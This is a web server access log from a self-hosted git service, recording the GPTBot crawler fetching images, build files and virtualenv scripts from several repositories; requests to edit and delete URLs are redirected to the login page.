"/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9842] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:17:09:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:17:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:17:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10042] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 11111] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 11119] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" -[17/Feb/2026:17:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11185] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11486] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13535] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:17:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12174] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:09:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:17:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:17:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:09:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10524] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:09:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:17:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:17:09:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:17:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 960] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:17:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:17:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10095] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:17:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14031] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:17:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 10976] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19904] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11528] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:17:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:17:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" 